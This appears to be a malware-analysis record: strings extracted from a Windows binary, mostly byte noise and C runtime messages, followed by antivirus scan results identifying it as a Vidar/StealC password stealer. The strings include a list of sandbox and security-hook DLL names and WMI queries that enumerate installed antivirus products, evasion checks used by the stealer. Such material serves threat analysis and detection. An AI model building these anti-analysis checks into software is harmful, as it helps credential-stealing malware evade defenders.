0?0F0M0_0f0t0
1%1,1Y1`1l1s1
2#2[2b2
4)4_4q4
5O5d5k5s5z5
6E6X6_6g6n6
8#9*959k9r9}9
;*;2;9;A;H;[;c;j;r;y;~;
<%=-=9=d=
?<?X?u?
0 0+0>0F0M0R0]0p0x0
1W1a1{1
3+383E3e3
475L5d5|5
7M8[8e8u8p9~9
5%7l7}7
4%505W566s6
:U:m:~:
>)?3?|?
1)1N1U1i1p1
2-242V2z2
4/4>4E4
5+5D5P5p5w5
5)666[6
9'9a9k9
:I;T;o;v;
="=D=r=
>&>.>8>\>f>o>~>
?%?6???G?P?g?
"0.050Z0a0y0
1'1I1X1e1
363W3f3
5&656<6t6
6O7g7m7v7
9H9h9o9w9~9
;";D;];
=:=_=u=
>>)>0>8>?>v>
>=?D?i?p?
323\3{3
5X6\6`6d6h6l6v6
7-747I7P7s7z7
7<8@8D8H8L8P8T8X8\8`8d8h8v8
9 949H9\9
=D=W=b>=?
&0A0U0f0|0
708@8M8h8m8t8
:);>;[;l;
=.>3>F>
1B1m1r1
2Q2b2o2|2
6c7r7@8
8L9^9&:
3e3w3}3
465P5d5
0N0}0
3!4.4;4H4f4m4x4
5.5^5m5
8+8Y8x8~8
8 9l9&:
<A<N<[<h<
>X>r>|>
?*?Q?x?
0@0G0Y0`0w0
0,1:1I1_1m1s1
3$3)373K3Q3_3&4L4Z4q4
51585I5g5u5z5
697J7X7^7c7q7
8$8*8;8V8\8m8
899I9V9[9`9l9
9C:S:`:e:j:v:
4.4<4D4a4g4l4z4
5!5)5/54595A5G5M5T5Z5`5e5j5r5x5}5
6"6(6/656;6@6E6M6S6X6]6e6k6q6x6~6
7&7+707:7B7G7L7V7^7c7h7r7z7
8 8(8.848;8A8G8L8Q8Y8_8d8i8q8w8}8
9"9'9,949:9?9D9L9R9X9_9e9k9p9u9}9
::':-:3:::@:E:J:P:X:^:c:h:p:v:|:
;!;&;+;3;9;>;C;K;Q;W;^;d;j;o;t;|;
<#<)</<5<;<A<F<K<R<W<\<b<g<l<v<~<
=#=*=0=6=;=@=H=N=S=X=`=f=l=s=y=
>&>+>0>>>F>L>Q>V>^>d>j>q>w>}>
?!?)?/?4?9?A?G?M?T?Z?`?e?j?r?x?}?
0 0%0*040<0B0G0L0T0Y0^0h0p0v0{0
1"1(1-121:1@1E1J1R1X1]1c1i1o1t1z1
2#2(2-252;2A2H2N2T2Y2^2f2k2p2y2
3!3'3+31353;3?3E3I3N3T3X3^3b3h3l3r3v3
3&393q3
4N5k5K6U6b6
<#<,<6<j<u<
>1?=?P?b?}?
0,0U0f0z0
343E3~3
4&4;4a4
>.>g>q>
>e?n?z?
0U0m0w0
;1;C;U;g;y;
0b1h1v1
;W>[>_>c>g>k>o>s>w>{>
8%808<8A8Q8V8\8b8x8
0(0c0}0
7.797U7{7
7!797a7
<$<*<4<:<D<J<T<Z<d<j<u<
\1`1d1h1l1p1t1x1|1
T=X=\=`=d=h=
P3T3X3\3`3d3h3l3p3t3x3|3
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
1$1,141<1D1L1T1\1d1l1t1|1
;$<(<,<0<4<8<<<@<D<T<X<h<l<p<x<
= =0=4=D=H=L=T=l=|=
>(>H>P>X>`>h>p>x>
? ?(?0?8?@?H?P?X?`?h?p?x?
0 0(000@0H0P0X0`0h0p0x0
1 1(10181@1H1P1X1`1h1p1|1
2 2(20282@2H2P2X2`2h2p2x2
2 3@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5(5H5P5X5`5h5t5
6$6,646<6D6L6T6\6d6l6t6|6
7 7(70787D7h7
8 8(80888@8H8P8X8`8h8p8x8
9$9,949<9D9L9T9\9h9
: :(:4:T:\:d:l:t:|:
;8;@;H;P;X;`;h;p;x;
< <(<0<8<@<H<P<X<`<l<
=$=,=4=<=D=L=X=x=
>$>,>4><>D>L>T>\>d>l>t>|>
? ?(?0?8?@?H?P?X?`?h?p?x?
0$0,040<0D0L0T0\0d0l0t0
1 1(10181@1H1P1X1`1h1p1x1
2$2,242<2D2L2T2\2d2l2t2|2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5$5,545<5D5L5T5`5
606P6X6`6h6p6x6
7(70787@7H7P7X7`7h7p7x7
8 8(80888@8H8P8X8`8h8p8x8
9$9,949<9D9L9T9\9d9l9t9|9
:$:,:4:<:D:L:T:\:d:l:t:|:
; ;(;0;8;@;H;P;X;`;h;p;x;
<$<,<4<<<D<L<T<\<d<l<t<|<
= =(=0=8=@=H=P=X=`=h=p=x=
> >$>,>@>H>\>l>|>
?$?0?P?\?|?
0(00080@0H0P0X0`0h0t0
1(101<1d1
2 2,2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
5 5(50585@5H5P5X5`5h5p5x5
6,6L6T6\6d6l6x6
7$7,747<7D7L7T7\7d7l7t7
888D8d8l8x8
9,949<9D9L9T9\9d9l9t9|9
:$:,:4:<:D:L:T:\:d:l:t:|:
;$;,;4;<;D;L;T;\;d;l;t;|;
<$<,<4<<<D<L<T<\<d<l<t<|<
= =(=0=8=@=L=l=t=|=
> >(>0>8>@>H>P>X>`>h>p>x>
? ?(?0?8?@?H?P?X?`?h?p?x?
0 0(00080@0H0P0X0`0h0p0x0
1 1P1X1`1h1p1|1
2$2D2L2T2\2d2l2x2
30383@3H3P3X3d3
4$4,444<4D4L4T4\4d4l4t4|4
5$5(5H5h5
606L6P6X6l6t6|6
080`0d0h0l0p0t0x0|0
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8
9 9$9(9
; ;$;(;,;0;4;
avghookx.dll
avghooka.dll
snxhk.dll
sbiedll.dll
api_log.dll
dir_watch.dll
pstorec.dll
vmcheck.dll
wpespy.dll
cmdvrt32.dll
cmdvrt64.dll
ChainingModeGCM
ChainingMode
nROOT\CIMV2
Select * From Win32_OperatingSystem
InstallDate
nroot\SecurityCenter2
Select * From AntiVirusProduct
displayName
image/jpeg
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=
BHH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
nKERNEL32.DLL
mscoree.dll
runtime error
TLOSS error
SING error
DOMAIN error
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
- abort() has been called
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
BMicrosoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
((((( H
h(((( H
H
WUSER32.DLL
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Vidar.i!c
tehtris Clean
ClamAV Win.Malware.Trojanx-10020177-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh Artemis!Trojan
ALYac Trojan.PSW.Vidar
Cylance Unsafe
Zillya Clean
K7AntiVirus Clean
BitDefender Gen:Variant.Zusy.536758
K7GW Clean
Cybereason malicious.92bab8
Baidu Clean
VirIT Clean
Symantec ML.Attribute.HighConfidence
Elastic Windows.Generic.Threat
ESET-NOD32 a variant of Win32/Vidar.A
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 99)
Kaspersky Trojan-PSW.Win32.Stealerc.lfc
Alibaba Trojan:Win32/StealC.18308105
NANO-Antivirus Clean
ViRobot Trojan.Win.Z.Zusy.210432
MicroWorld-eScan Gen:Variant.Zusy.536758
Tencent Clean
TACHYON Clean
Sophos Troj/Stealc-AAB
F-Secure Trojan.TR/AVI.vidar.vkkfn
DrWeb Trojan.PWS.Steam.37379
VIPRE Gen:Variant.Zusy.536758
TrendMicro TrojanSpy.Win32.VIDAR.YXEFZZ
McAfeeD Real Protect-LS!BAA9E1A92BAB
Trapmine malicious.high.ml.score
FireEye Generic.mg.baa9e1a92bab8527
Emsisoft Gen:Variant.Zusy.536758 (B)
SentinelOne Static AI - Suspicious PE
Jiangmin Clean
Webroot W32.ConvaGent
Varist W32/ABTrojan.GFVJ-3509
Avira TR/AVI.vidar.vkkfn
Antiy-AVL Trojan[PSW]/Win32.StealerC
Kingsoft Win32.Trojan-PSW.Stealerc.lfc
Gridinsoft Spy.Win32.Vidar.tr
Xcitium Clean
Arcabit Trojan.Zusy.D830B6
SUPERAntiSpyware Clean
ZoneAlarm Trojan-PSW.Win32.Stealerc.lfc
GData Gen:Variant.Zusy.536758
Google Detected
AhnLab-V3 Trojan/Win.Generic.R651657
Acronis Clean
McAfee Artemis!BAA9E1A92BAB
MAX malware (ai score=86)
VBA32 BScope.TrojanPSW.Mars
Malwarebytes Malware.AI.111572029
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall TrojanSpy.Win32.VIDAR.YXEFZZ
Rising Stealer.Agent!8.C2 (TFE:2:DQwxTsXk3kJ)
Yandex Clean
Ikarus Trojan.Win32.Vidar
MaxSecure Clean
Fortinet W32/Vidar.A!tr
BitDefenderTheta AI:Packer.3A35A2FB1F
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Trojan:Win/Vidar.A
No IRMA results available.